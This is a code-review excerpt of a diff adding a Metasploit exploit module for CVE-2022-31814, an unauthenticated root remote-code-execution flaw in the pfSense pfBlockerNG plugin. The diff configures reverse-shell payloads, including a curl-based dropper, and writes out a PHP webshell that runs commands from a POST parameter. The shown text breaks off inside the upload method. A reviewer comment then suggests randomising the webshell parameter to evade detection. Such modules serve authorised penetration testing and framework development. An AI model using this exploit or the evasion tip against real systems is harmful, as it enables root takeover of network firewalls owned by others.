modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb

```diff
@@ -0,0 +1,141 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',
+        'Description' => %q{
+          pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to
+          block inbound connections from whole countries or IP ranges. Versions equal to and below 2.1.4_26 are affected
+          by an unauthenticated RCE vulnerability that results in root access.
+        },
+        'Author' => [
+          'IHTeam', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'CVE', '2022-31814' ],
+          [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_openssl'
+              },
+              'Payload' => {
+                'Append' => ' & disown'
+              }
+            }
+          ],
+          [
+            'BSD Dropper',
+            {
+              'Platform' => 'bsd',
+              'Arch' => [ARCH_X64],
+              'Type' => :bsd_dropper,
+              'CmdStagerFlavor' => [ 'curl' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DisclosureDate' => '2022-09-05',
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WEBSHELL_NAME', [
+          false, 'The name of the uploaded webshell. This value is randomly set with a specific length if unset.', nil
+        ])
+      ]
+    )
+  end
+
+  def upload_shell
+    print_status 'Uploading shell...'
+    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(8..16)}.php"
+    print_status("Webshell name is: #{@webshell_name}")
+    web_shell_contents = <<~EOF
+      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["c"]));');
```

Comment:
I'm fairly certain this `c` parameter could be randomized with a little bit of code, otherwise its fairly easily detected. Not a major issue though.